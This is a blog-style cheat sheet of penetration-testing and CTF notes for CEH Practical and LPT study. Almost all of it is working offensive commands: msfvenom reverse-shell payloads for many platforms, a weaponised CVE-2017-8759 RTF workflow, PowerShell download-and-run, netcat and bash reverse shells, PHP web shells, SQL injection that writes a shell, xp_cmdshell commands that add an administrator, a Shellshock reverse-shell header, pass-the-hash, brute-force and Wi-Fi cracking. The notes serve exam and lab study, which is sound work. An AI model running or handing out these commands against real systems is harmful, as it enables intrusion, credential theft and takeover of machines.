CEH Practical – LPT Master – CTF – Notes in general

CEH Practical – LPT (Master) – CTF

Notes

 

 

I have gather these notes from internet and cources that I have attended .

Special thanks to:

JENS GILGES

https://www.linkedin.com/in/jens-gilges-1aa719151/

 

I used this site as notepad to remember things, not to get you an answer. So if you don’t like it, don’t read it.

It has no structre and no index, just my notes from videos, other sites and manuals.

And I dont go thru spelling checks before post.

 

Thanks for the knowledge:

https://highon.coffee/

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

 

 

 

 

 

 

 

 

Recon/Information Gathering

 

Passive

Social Media, Company Website, Public Availble Resources, Jobs Openning. Netcraft, Archive.org, Shodan, Metagofile, Maltego,recon-ng, Pipls, Thearchive.org,sub3listr

 

Active

Interactive with the victim. Become a facebook friend for example

 

Goggle Search

site:”invid.se” filetype:pdf

intitle:”VNC viewer for Java”

intitle:”VNC viewer for Java”

inurl:”/control/userimage.html”

inurl:.php? intext:CHARACTER_SETS,COLLATIONS intitle:phpmyadmin

 

Extract ip from host command

host http://www.cisco.com | grep “has address” |cut -d” ” -f4

 

Extract domain from index.html

wget invid.se

cat index.html | grep “href” | cut -d”/” -f3 | grep “site\.se” | cut -d'”‘ -f1 | sort -u > site.txt

www data extractor

Windows

Web Data Extractor

Linux

httrack (linux)

Enumeration / Scanning

Banner grabbing

whatweb host.se

Netdiscover

Passive Mode

netdiscover -i eth0 -p

Active Mode

netdiscover -ai eth0 -r 192.168.8.0/24 -f

 

Nmap explain closed,filtered

An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port. Finding these is often the primary goal of port scanning. Security-minded people know that each open port is an avenue for attack. Attackers and pen-testers want to exploit the open ports, while administrators try to close or protect them with firewalls without thwarting legitimate users. Open ports are also interesting for non-security scans because they show services available for use on the network.

closed

A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it. They can be helpful in showing that a host is up on an IP address (host discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it may be worth scanning later in case some open up. Administrators may want to consider blocking such ports with a firewall. Then they would appear in the filtered state, discussed next.

filtered

Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.

unfiltered

The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.

open|filtered

Nmap places ports in this state when it is unable to determine whether a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.

closed|filtered

This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.

 

Nmap examples

nmap -p 80 –script=http-enum http://www.certifiedhacker.com

nmap -p- -Pn -sS -sV -A 10.10.10.1

nmap -p- -Pn -sU -sS -sV -A 10.10.10.1

nmap -sC -sV -oA nmap/initial 10.10.10.1

nmap -p 445 –script safe -Pn -n 10.10.10.1

nmap -p 445 –script “vuln and safe” -Pn -n 10.10.10.1

Nmap Scripts

–script=vuln All default vulnerability scrips

–script=http-enum HTTP enum Banner Grab and so on

–script=http-shellshock Shellchock detect

–script=smb-brute SMB Brute Force

 

Search for scripts

grep -r categories /usr/share/nmap/scripts/*.nse

grep -r categories /usr/share/nmap/scripts/*.nse | grep safe

grep -r categories /usr/share/nmap/scripts/*.nse | grep -oP ‘”.*?”‘| sort -u

grep -r categories /usr/share/nmap/scripts/*.nse | grep default | awk -F: ‘{print $1}’

 

Default scripts and smb:

locate -r ‘\.nse$’ | xargs grep categories | grep ‘default\|version’ | grep smb

Nmap – Options

-n disable dns

-sC standard scipt

-sn ping sweep

-sT Connect Scan 3 way handshake

-sS Stealth halv open scan syn ->syn ack -> reset

-sX Xmas scan (Fin/Urg/push) no repsonse port open (LINUX machines)

-sN Nullscan TCP packet with no data. no repsonse port open (LINUX machines)

-sV Version

-sU UDP scan

-p- -A all ports and Agressive

-sU -p 162 snmp agent

Nmap – Combos

-sS -sV Stealt and Version

-sI Idle scan, zombie node (good for ids)

-sS -O Operating System

-sn -f Ping sweep fragmentation

-p 80 -A -T3 Port 80 Agressive on port 80 and tray harder with T3 (T0 -T5) T0 slow T5 fast

-sS -D:RND:10 Decoy

 

Portscaning with Netcat

TCP scan

nc -nvv -w 1 -z 10.0.2.15 1-10000

 

UDP scan

udp can have false positive if the host dont respond on icmp

nc -unvv -w 1 -z 10.0.2.15 160-165

 

Hping3

Half-Open SYN scan

hping3 -8 -S 1.2.3.4.5 -p 80

XMAS Tree Scan

hping3 -F -P -U

Null Scan

hping3

Fin Scan

hping3 -F

Ack Scan

hping3 -A

Udp scan

hping3 -2

 

Ping and portscan from shell

ping from shell to get online hosts

for ip in $(seq 1 254); do ping -c 1 172.20.40.$ip > /dev/null && echo “Online: 172.20.40.$ip”; done

 

Portscan from shell without nmap or you can download static nmap from github

for port in 22 25 80 443 445 8080 8443; do (echo Anything > /dev/tcp/172.20.40.201/$port && echo “open – $port”) 2> /dev/null; done

 

Look for ports that is open or close with bash

bash -c ‘echo 1> /dev/tcp/172.20.20.188/1900 && echo open || echo false’

 

Gobuster

./gobuster -fw -k -u https://10.10.10.1 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Dirb

dirb http://10.10.10.1 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Curl

curl –url “imap://mail.example.com/” –user “bobby:tables”

Upload

curl –upload-file file.txt -v –url <url> -0 –http1.0

Cewl

Find words on webpages that can be used for password crack.

cewl http://www.site.se -m 6 -w /cewl.txt

Can then be passed to John The Ripper

 

Directory or Path Traversal

192.168.1.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd

Null Byte

?page=../../../../../etc/passwd%00

 

Wpscan

wpscan –u http://10.1.1.1/ –enumerate t –enumerate t –enumerate u

wpscan -u http://10.1.1.1 -e –log tenten_wpscan.txt

wpscan –url <url> Scan cms

wpscan –url <url> –enumerate vp (Scan plugins)

wpscan –url <url> –enumerate ut (scan Themes)

wpscan –url <url> –enumerate u (Enumerate Users)

wpscan –url <url> –wordlist pass.txt threats 50 (BruteForse)

 

Metagoofil

metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html

Nikto

nıkto -h 10.1.1.1

 

Drupe scan

./droopescan scan drupal -u http://192.168.2.152

Dns

nslookup

server 10.10.10.100

 

host -t ns domain.se

host -t mx domain.se

host http://www.domain.se

Zonetransfer

host -t axfr domain.se ns1.domain.se

host -l domain.se 10.1.1.1

zone transfers

host -l server.se ns3.server.se.

 

Reverse DNS

theharvester -n -d host.se -b all

Dnsenum

dnsenum domain.se

 

Dnsrecon

dnsrecon -d 10.10.10.100 -r 10.0.0.0/8

Smtp

vrfy

for user in $(cat users.txt); do echo VRFY $user |nc -nv -w 192.168.1.1 25 2>/dev/null | grep ^”250″;done

Python script to vrfy

python

#!/usr/bin/python

import socket

import sys

if len(sys.argv) !=2:

print “Usage: vrfy.py <username>”

sys.exit(0)

 

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=s.connect((‘127.0.0.1’,25))

print banner

s.send(‘VRFY ‘ + sys.argv[1] + ‘r\n\’

result=s.recv(1024)

print result

s.close()

Smb

Rpcclient

Old

rpcclient -U roger 192.168.1.1

srvinfo

enumdomusers

enumalsgroups domain

lookupnames administrators

querydominfo

enumdomusers

queryuser roger

Nbtscan

nbtscan -f target

nbtscan -v verbose

Smb enumeration

Enum4linux -a 192.168.1.1

 

Smb nmap

nmap –script=vuln 192.1681.1 -p445

Smbclient

Look for shares

smbclient -L //10.10.10.100 -U name

smbclient \\\\192.168.1.1\\Share -W DOMAIN -U roger

Smbmap

Locate Shares:

smbmap -H 10.10.10.100

List Files on Share

smbmap -R Replication -H 10.10.10.100

List Files

smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q

 

smbmap -u username -p ‘HASH:HASH’ -H 192.168.1.1 -R –download path/pathtofile.xt

 

–download Download file with smbmap

Smbclient

smbclient //10.10.10.100/Replication

recurse ON

prompt OFF

mget *

Smb impacket

/usr/share/doc/python-impacket/examples/GetADUsers.py -all domain.dc/svc_user -dc-ip 10.10.10.1

 

/usr/share/doc/python-impacket/examples/psexec.py domain.dc/svc_tgs@10.10.10.1

smbmap -d domain.dc -u svc_user -p password -H 10.10.10.1

 

/usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.1 domain.dc/svc_user

 

/usr/share/doc/python-impacket/examples/psexec.py domain.dc/Administrator@10.10.1.1

-R ‘List file

Password from GPO Policy

less /usr/share/smbmap/10.1.1.1/Replication_domain.dc_Policies_\{31B2F340-016D-11D2-945F-00C0aFB984F9\}_MACHINE_Preferences_Groups_Groups.xml

edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

 

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJa3mjWA98ga9guKOhaOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

PASSWORDWITH_gpp-decrypt

 

Windows Tips

Run as command

runas /netonly /user:domain.dc\svc_user cmd

Windows Credentials Editor (WCE)

wce64.exe -w

Sharphound

SharpHound.exe -c all -d domain.dc –domaincontroller 10.10.1.1

Find files Windows

where /R C:\ bash.exe

 

Getting Access and Maintaining Acccess

Searchsploit

Mirror down

searchsplit -m exploits/php/webapps/18650.py

 

searchsploit -x exploits/php/webapps/18650.py

searchsploit -p exploits/php/webapps/18650.py

Metasploit

Start databas

service postgresql start

Start Metasploit

msfconsole -q

 

exit backround session ctrl z or type background

 

exploit -j

sessions -i

sessions l

setg = global value ex. setg RHOST 192.168.1.1

Metaexploit Steps

mfsconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set LHOST ip

SET LPORT port

exploit -j

 

Access the exploit

shell.aspx

 

shell

systeminfo

 

search suggest exploits

use post/multi/recon/local_exploit_suggester

set SESSION 1

run

 

use exploit/windows/local/ms10_015_kitrap0d

set lhost ip

set lport port

Create Payloads

Msfvenom

Linux

msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.1 LPORT=4444 SHELL=/bin/bash -a cmd –platform Unix -e generic/none

 

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f elf > shell.elf

Windows

msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.1 lport=8888 –f exe > /root/Desktop/1.exe

 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f macho > shell.macho

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.php

cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php

msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.14.10 LPORT=4444 > r2.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f war > shell.war

Python

msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.1 LPORT=444 -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.1 LPORT=444 -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=444 -f raw > shell.pl

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>

Unicorn

Create Payload

python unicorn.py windows/meterpreter/reverse_http 10.1.1.1 8001

Use exploit and create payload

Exploit:

chmod 755 cve-2017-8759_toolkit.py

 

Create Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6996 -f exe > /tmp/gotcha.exe

 

Create rtf file from exploit

python cve-2017-8759_toolkit.py -M gen -w Gotcha.rtf -u http://192.168.1.101/gotcha.txt

 

Host The Payload on our server

python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.101/gotcha.exe -l /tmp/gotcha.exe

Mini webserver with python

python -m SimpleHTTPServer 80

Filedownload

PowerShell

powershell IEX(new-object net.webclient).downloadstring(‘http://10.1.1.10/empire.ps1‘)”

Linux

wget 192.168.1.1:80/attack.txt

curl 192.168.1.1:80/attack.txt > file.txt

fetch http:// 192.168.1.1:80/attack.txt

 

Victim > Attacker

nc -lvp 4444 > file.txt

nc 192.168.1.1 4444 < file.txt

 

Attacker > Victim

Target

nc -nvlp 81 > file.txt

Attacker

nc 192.268.1.1. 82 < file.txt

 

Netcat

Victim:

nc -lvnp 4444 > incomming.exe

Source:

nc -nv 10.0.2.15 4444 </usr/share/windows-binaries/wget.exe

 

Windows

Tftp

Server

atftpd -v –port 69 –bind-address 10.10.10.2 –daemon /srv/tftp/

Client

tftp -i 192.168.1.1 GET nc.exe

 

Ftp

On Windows you can script this with a text file

ftp -s ftp.txt

Ftp 192.168.1.1.1

ls

get nc.exe

put nc.exe

set binary

Reverse Shell

Netcat

Ncat to get support for ssl and rules

Listener

nc -lvnp 4444

Connector

nc -nv 192.168.1.1 25

 

Netcat Command execution

Victim

nc -lvnp 4444 -e /bin/bash

Source

nc -nv 10.0.2.15 4444

Netcat Windows to get PowerShell shell

nc64.exe 10.1.1.1 9001 -e powershell

 

Shell from dash or bad shell

Attacker:
nc -nlvp 9001

Victim
bash -c ’bach -i >& /dev/tcp/192.168.1.1/9001 0>&1’

You get shell on Attacker then
python -c ‘import pty; pty.spawn(“/bin/bash”)’

After that

script -q /dev/null

Then backround

ctrl z

Then type

stty raw -echo

Then hit fg for foreground

 

OpenSSH

Create Cert

openssl req -x509 -newkey
rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

 

Start the Listener on Attacker

openssl s_server -quiet
-key key.pem -cert cert.pem -port 4444

 

Start reverse shell on victim with openssl

mkfifo /tmp/s; /bin/sh -i <
/tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.1. >
/tmp/s; rm /tmp/s

ASPX

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o shell.aspx

PHP

Create s.php

/*s.php*/

<?php echo shell_exec($_GET[‘cmd’]);?>

 

Copy nc.exe and s.php to web folder

 

http://10.10.10.1/s.php?cmd=nc 10.10.14.10 4444 -e cmd

 

wget 10.1.1.1:80/php-reverse-shell.txt -P /var/www/admin/

mv /var/www/admin/php-reverse-shell.txt /var/www/admin/php-reverse-shell.php

Nice remote shell

python -c ‘import pty; pty.spawn(“/bin/bash”)’

set TERM=linux

No real bash

ctrl z

background

stty raw -echo

fg

 

Password

Responder

Set up responder to listen to clients and capture hashes

responder

 

Capture LTM hashes from sql injection

Start smb server On Attacker

impacket-smbserver share $(pwd)

 

Use this on the webpage:

; use master; exec xp_dirtree ‘\\10.1.1.1\share’;–

Unshadow

sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt

HASHCAT

hashcat -h | grep -i ntlm

 

hashcat -m 3100 haches.txt /opt/share/wordlist/rocky.txt

 

to launch a combination attack against MD5 password hashes

hashcat -m 0 -a 1 /root/hashes/hashes.txt /root/rockyou.txt

 

a straight through attack is super fast on simple passwords

hashcat -m 0 -a 0 /root/hashes/hashes.txt /root/rockyou.txt

 

John The Ripper

john hashes.txt -format=nt -show (CrackNTLM)

 

use the cewel.txt in john the ripper to

 

john –wordlist=cvewl.txt –rules –stdout > pass.txt

 

john –wordlist:/usr/share/wordlists/rockyou.txt

 

RSA

Now we need to convert the rsa key to john format and save it in a file:

#root@kali: ssh2john rsakey > rsa2johnfile

 

Now crack the passphrase using any wordlist:

#root@kali: john –wordlist=/usr/share/wordlists/rockyou.txt –format=SSH rsa2johnfile

 

When it’s done, you can show the password if it has been cracked by issuing the following command:

#root@kali: john –show rsa2johnfile

Passwords dumps Windows

Pwdump and FGdump

crunch Create Passwordlists

crunch 6 6 01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ

 

Passing The Hash

Passing the hash

pth-*

export SMBHASH=1231234124124124124:1243124124124124124124124

pth-winexe -U administrator% //192.168.1.1 cmd

 

Medusa

medua -h 192.168.1.1. -u admin -P password.txt -M http -m DIR:/admin -T 20

 

Ncrack

use for rdp brute force

ncrack -v -f –user administrator -P password.txt rdp//192.168.1.1,CL1

Hydra

hydra -l root -P /usr/share/wordlists/rockyou.txt -u -s 22 10.1.1.1 ssh

 

hydra 10.1.1.1 -V -l user -P /usr/share/wordlists/rockyou.txt http-get-form “/login.php:username=^USER^&password=^PASS^&Login=Login:F=The password you entered was not valid.:H=Cookie: PHPSESSID=2tr9o96unnmlrgfom8hbaqhp7l; security=low”

 

hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form “/:password=^PASS^:Invalid password!” -s 54415 -I

MySQL

Connect to local database

mysql -u zabbix -D zabbixdb -p

Sqlmap

Use burpsuite to capture login request

Save login request to login.req

sqlmap r login.req –level 5

Search for databases

sqlmap –u http://192.168.1.1/index.php?par= –dbs

Checking privileges of the users in database

sqlmap –u 192.168.1.124/sqli/Less-1/?id=1 –privileges

 

Reading a file from the web server

sqlmap -u 192.168.1.124/sqli/Less-1/?id=1 –file-read=/xampp/htdocs/index.php –batch

 

Dump Username and Password

sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –dump -threads=5

 

Dump tables

sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –tables –-dump

sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –T tablename –-dump

 

Automated Shell

sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –os-shell

 

sqlmap -u http://10.1.1.1/login.php –forms –level 5 –risk 3 –string “The password you entered was not valid.” –dbs –batch

 

sqlmap -l trace.txt –dbs (RDBMS Enum)

sqlmap -l trace.txt -D <db> –tables (Dump tables)

sqlmap -l trace.txt -D <db> -T <table> –dump (Dump table content)

 

Crawl links

sqlmap -u http://192.168.1.1 –crawl=1

sqlmap -u http:// 192.168.1.1 –forms –batch –crawl=5 –cookie=jsessionid=1234 –level=5 –risk=3

 

Manual sql injection commands

 

Check for sqli vulnerability

?id=1′

 

Find the number of columns

?id=1 order by 9 — –

 

Find space to output db

?id=1 union select 1,2,3,4,5,6,7,8,9 — –

 

Get username of the sql-user

?id=1 union select 1,2,3,4,user(),6,7,8,9 — –

 

Get version

?id=1 union select 1,2,3,4,version(),6,7,8,9 — –

 

Get all tables

?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables — –

 

Get all columns from a specific table

?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = ‘users’ — –

 

Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)

?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users

 

Read file

?id=1 union select 1,2,3,4, load_file(‘/etc/passwd’) ,6,7,8,9 — –

?id=1 union select 1,2,3,4, load_file(‘/var/www/login.php’) ,6,7,8,9 — –

 

Create a file and call it to check if really created

?id=1 union select 1,2,3,4,’this is a test message’ ,6,7,8,9 into outfile ‘/var/www/test’ — –

?id=1 union select 1,2,3,4, load_file(‘/var/www/test’) ,6,7,8,9 — –

 

Create a file to get a shell

?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>’ ,6,7,8,9 into outfile ‘/var/www/shell.php’ — –

?id=1 union select null,null,null,null, load_file(‘/var/www/shell.php’) ,6,7,8,9 — –

 

Then go to browser and see if you can execute commands

http://<targetip>/shell.php?cmd=id

 

Sql injections

User name

Password

SQL Query

tom

tom

SELECT * FROM users
WHERE name=’tom’
and password=’tom’

tom

‘ or ‘1’=’1

SELECT * FROM users
WHERE name=’tom’
and password=” or ‘1’=’1′

tom

‘ or 1=’1

SELECT * FROM users
WHERE name=’tom’
and password=” or 1=’1′

tom

1′ or 1=1 — –

SELECT * FROM users
WHERE name=’tom’
and password=” or 1=1— -‘

‘ or ‘1’=’1

‘ or ‘1’=’1

SELECT * FROM users
WHERE name=” or ‘1’=’1′
and password=” or ‘1’=’1′

‘ or ‘ 1=1

‘ or ‘ 1=1

SELECT * FROM users
WHERE name=” or ‘ 1=1’
and password=” or ‘ 1=1’

1′ or 1=1 — –

blah

SELECT * FROM users
WHERE name=’1′ or 1=1 — -‘
and password=’blah’

 

‘or 1=1#

 

‘ or ‘1’=’1

 

Command injections

;ls

 

sqsh – Interactive database shell for Sybase

Login

sqsh -S 127.0.0.1:123 -U sa -P secretpassword

exec xp_cmdshell ‘whoami’

go

exec xp_cmdshell ‘net user roger pass /add’

go

exec xp_cmdshell ‘net localgroup Administrators roger /add’

go

exec xp_cmdshell ‘net localgroup “Remote Desktop Users” roger /add’

go

Shellshock with Burpsuite

User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.1/8081 0>&1

Snmp

snmpwalk 10.1.1.1 -c public -v 2c

onesixtyone

HEX to TXT and Back

xxd -ps fil.txt > fil.txt.hex

vi fil.txt.hex

xxd -r -ps fil.txt.hex > fil.txt

Stego and Strings

steghide –extract -sf ./Granted.jpg

binwalk -e

java -jar Stegsolve.jar

strings ./HackerAccessGranted.jpg

Stego Links

https://www.dcode.fr/caesar-cipher

https://www.splitbrain.org/_static/ook/

https://incoherency.co.uk/image-steganography/#unhide

 

Magic Numbers

hex to bin

xxd -r hashdump.txt hex.bz2

Links

https://en.wikipedia.org/wiki/List_of_file_signatures

Base64 encode decode

base64 filename.exe > file.txt

base64 -d file.txt > filename.exe

Base64 command and execute

echo ls /home | base64

bHMgL2hvbWUK

echo bHMgL2hvbWUK | base64 -d | bash

 

ProxyChains

Comming

Chisel

 

TCP tunnel over HTTP

https://github.com/jpillora/chisel.git

 

Attacker

chisel server -p 8000 -reverse -v

 

Client (Victim)

chisell client 172.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80

 

Windows Privilage Escalation

systeminfo

hostname

echo %username%

 

net users

 

ipconfig /all

route print

arp -A

netstat -ano

 

netsh firewall show state

netsh firewall show config

netsh advfirewall firewall show rule all

 

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:”KB..” /C:”KB..”

 

Sysinternals

accesschk.exe

 

net start

net stop

 

Registry Checks for Passwords

reg query HKLM /f password /t REG_SZ /s >pass.txt

reg query HKCU /f password /t REG_SZ /s >pass.txt

 

C:\sysprep.inf

C:\sysprep\sysprep.xml

%WINDIR%\Panther\Unattend\Unattended.xml

%WINDIR%\Panther\Unattended.xml

 

dir /b /s unattend.xml

dir /b /s web.config

dir /b /s sysprep.inf

dir /b /s sysprep.xml

dir /b /s *pass*

dir /b /s vnc.ini

 

Find writable files

dir /a-r-d /s /b

Empire Setup

git clone https://github.com/EmpireProject/Empire.git -b dev

cd Empire

cd setup

setup.sh

 

PowerShell

Invoke-AllChecks

 

Linux Privilege Escalation

The things that I have used from this page is:

# Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here.

find / -perm -1000 -type d 2>/dev/null

# SGID (chmod 2000) – run as the group, not the user who started it.

find / -perm -g=s -type f 2>/dev/null

# SUID (chmod 4000) – run as the owner, not the user who started it.

find / -perm -u=s -type f 2>/dev/null

 

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID

for i in `locate -r “bin$”`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in ‘common’ places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

 

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

LinEnum

./LinEnum.sh -t > kali.txt

Commands

cat /etc/issue

cat /etc/lsb-release

cat /etc/passwd

cat /etc/group

cat /etc/shadow

ps aux | grep root

crontab -l

Port forward

ssh -L 8080:127.0.0.1:80 root@192.168.1.1

ssh -R 8080:127.0.0.1:80 root@192.168.1.1

 

Binary Exploitation

Tools

OllyDebuger

Immunity Debugger

gdb

Binary Ninja

 

Stacks

Buffers

Fuzzing

Registers

EAX

ECX

EDX

EBX

ESP

EBP

ESI

EDI

EIP Control the path of Code execution

 

Debug Applications

r2

aaa (Analyse all)

afl (List funtions)

pdf @ main

pdc @main as c code

 

ldd list libarary to an application

ldd /usr/

 

Ruby pattern create tool

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb

 

Ruby mach was was found in the EIP

/usr/share/metaspoit-framwork/tools/pattern_offset.rb

 

Ruby find jmp esp

/usr/share/metaspoit-framwork/tools/nasm_shell.rb

JMP ESP

 

Shrink Go Binaries

Shrink go binaries

go build -ldfkags=”-s -w”

and

upx brute chisel

Tcp dump icmp packets

tcpdump -i eth0 icmp -n

 

Covering Tracks

Metasploit

 

Linux tips and tricks

Updatedb

Update database for mlocate

updatedb

 

Count characters

echo -n asjdflkjalskdjflkjasdfljldkf | wc -c

 

md5sum

echo -n ’ asjdflkjalskdjflkjasdfljldkf’ | md5sum

Run a command immune to hangups

nohup

Wireless

### Check Config

iwconfig

### Enable Monitoring

airmon-ng start

iwconfig

### Looking for AP

airodump-ng wlan0mon

### Looking for Clients

airodump-ng –bssid <ap> –channel <ap channel> wlan0mon

### Start Recording

airodump-ng –bssid <ap> –channel <ap channel> –showack -w wpa_log wlan0mon

### Deauth

airplay-ng -0 20 -a <ap> -c <client> wlan0mon

## Crack

aicrack-ng wpa_log.cpa -w usr/share/wordlist/rockyou.txt

 

 

 

 

 

 

 

 

 

 

 

 

 

Links

Exploits

https://www.exploit-db.com/google-hacking-database

 

John The Ripper

https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c

 

Linux Priv Escalation

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

 

Magic Numbers

https://en.wikipedia.org/wiki/List_of_file_signatures

 

Stego Links

https://www.dcode.fr/caesar-cipher

https://www.splitbrain.org/_static/ook/

https://incoherency.co.uk/image-steganography/#unhide

Github tools

0d1n

Door404

Hacking-Tools-Repository

massExpConsole

routersploit

Sublist3r

airgeddon

DorkMe

hashcat-legacy

metagoofil

scavenger

takeover

aron

droopescan

hashstack-server-plugin-jtr

nemesis

SecLists

TheFatRat

AutoSploit

EagleEye

InSpy

osint-scraper

seeker

Trity

badKarma

Eternalblue-Doublepulsar-Metasploit

Leaked

osrframework

SharpHound

wordlist

Bashark

exploitpack-master

linpostexp

Photon

SiteBroker

wpscan

BloodHound

firesheep

Log-killer

PowerSploit

SocialBox

xerxes

Cl0neMast3r

fuxploider

lscript

pywerview

SocialFish

Cortex-Analyzers

Gopherus

machine_learning_security

ReconDog

sshng2john

DarkSpiritz

hackbox

mail-security-tester

RED_HAWK

 

stash.sqlite

 

3 thoughts on “CEH Practical – LPT Master – CTF – Notes in general

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.